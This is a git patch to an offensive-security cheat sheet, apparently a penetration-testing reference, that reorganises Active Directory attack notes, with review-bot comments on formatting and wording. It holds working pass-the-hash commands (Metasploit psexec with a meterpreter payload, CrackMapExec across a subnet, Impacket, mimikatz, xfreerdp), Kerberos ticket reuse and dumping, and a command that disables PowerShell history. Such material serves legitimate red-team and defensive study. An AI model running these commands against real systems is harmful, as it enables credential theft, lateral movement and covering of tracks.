From 44735975a5e5e05a1554cca232c3c841c5276fca Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 12 Jul 2021 20:45:16 +0200 Subject: [PATCH] Active Directory update --- .../Active Directory Attack.md | 76 +++++++++++-------- .../Windows - Privilege Escalation.md | 2 + .../Windows - Using credentials.md | 1 + 3 files changed, 47 insertions(+), 32 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 913822a..10b7cf4 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -1506,35 +1506,31 @@ Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso. The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. -```powershell -use exploit/windows/smb/psexec -set RHOST 10.2.0.3 -set SMBUser jarrieta -set SMBPass nastyCutt3r -# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. -# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) -set PAYLOAD windows/meterpreter/bind_tcp -run -shell -``` - -or with crackmapexec - -```powershell -cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" -also works with net range : cme smb 10.2.0.2/24 ... -``` - -or with psexec - -```powershell -proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d -``` - -or with the builtin Windows RDP and mimikatz -```powershell -sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" -``` +* Metasploit + ```powershell + use exploit/windows/smb/psexec + set RHOST 10.2.0.3 + set SMBUser jarrieta + set SMBPass nastyCutt3r + # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. 
+ # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + set PAYLOAD windows/meterpreter/bind_tcp + run + shell + ``` +* CrackMapExec + ```powershell + cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + ``` +* Impacket suite + ```powershell + proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d + ``` +* Windows RDP and mimikatz + ```powershell + sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 + sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" + ``` You can extract the local **SAM database** to find the local administrator hash : 
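Review bot: the "Windows RDP and mimikatz" bullet now holds two `sekurlsa::pth` lines that differ without saying how: the first carries concrete values (`/user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863`) but no `/run:`, the second keeps the empty `/user: /domain: /ntlm:` placeholders together with `/run:"mstsc.exe /restrictedadmin"`; either fill the placeholders on the second line and drop the first, or add a one-line comment above each stating which form it is. Two smaller points in the same hunk: the CrackMapExec bullet changed the target from `10.2.0.2` to `10.2.0.2/24` and removed the line saying a single host also works, so the single-host form is no longer documented; and `# NOTE2: Require the full NTLM hash` should read `Requires`.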
@@ -2625,15 +2621,30 @@ Navigate to any web application that is integrated with our AAD domain. Once at ### CCACHE ticket reuse from /tmp -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache` - > When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. + +```powershell +$ ls /tmp/ | grep krb5cc +krb5cc_1000 +krb5cc_1569901113 +krb5cc_1569901115 + +$ export KRB5CCNAME=/tmp/krb5cc_1569901115 +``` + + ### CCACHE ticket reuse from keyring Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey ```powershell +# Configuration and build +git clone https://github.com/TarlogicSecurity/tickey +cd tickey/tickey +make CONF=Release + [root@Lab-LSV01 /]# /tmp/tickey -i [*] krb5 ccache_name = KEYRING:session:sess_%{uid} [+] root detected, so... DUMP ALL THE TICKETS!! 
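Review bot: the new fence holding `$ ls /tmp/ | grep krb5cc` and `$ export KRB5CCNAME=/tmp/krb5cc_1569901115` is tagged `powershell` although it is a Linux shell session; tag it `bash` so it matches the `$` prompt and the `export` syntax. The removed blockquote was the only place stating that CCACHE files are stored in /tmp with 600 permissions, which is the detail that scopes reuse to the file owner or root; keep that sentence after the new `krb5cc_%{uid}` explanation rather than dropping it. In the tickey fence, the added build steps (`git clone`, `cd tickey/tickey`, `make CONF=Release`) are followed by the unchanged `/tmp/tickey -i` invocation with no step that puts the built binary at `/tmp/tickey`; add the copy step or the real build output path so the sequence can be followed as written. The two blank `+` lines inserted before `### CCACHE ticket reuse from keyring` are unnecessary.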
@@ -2794,4 +2805,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) * [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work) -* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) \ No newline at end of file +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) +* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 0c16534..bde930e 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -541,6 +541,8 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ### Powershell History +Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. + ```powershell type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 4c6e96a..346c8f4 100644 --- a/Methodology and Resources/Windows - Using credentials.md 
+++ b/Methodology and Resources/Windows - Using credentials.md @@ -292,6 +292,7 @@ Abuse RDP protocol to execute commands remotely with the following commands; # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. # pass the hash works for Server 2012 R2 / Win 8.1+ + # require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11 root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d ``` * [SharpRDP](https://github.com/0xthirteen/SharpRDP)
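Review bot: in the Active Directory Attack.md references hunk, the new "Attacking Active Directory: 0 to 0.9" entry still ends with `\ No newline at end of file`; add the trailing newline so the next appended reference does not again show up as a two-line change to an unchanged entry.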
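Review bot: in the Windows - Privilege Escalation.md hunk, the added sentence `Disable Powershell history: Set-PSReadlineOption -HistorySaveStyle SaveNothing` should state its scope: the option applies to the PSReadLine session it is run in (it persists only if placed in a profile) and it does not remove the existing `ConsoleHost_history.txt` that the `type` commands below read, which is the file a reviewer or responder will still find on disk. Spell `PowerShell` consistently in the new line.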
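Review bot: in the Windows - Using credentials.md hunk, `# require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11` should read `requires` and should name the distribution whose package names these are; the neighbouring comment (`pass the hash works for Server 2012 R2 / Win 8.1+`) describes the target, so a reader cannot tell which client package manager the names apply to.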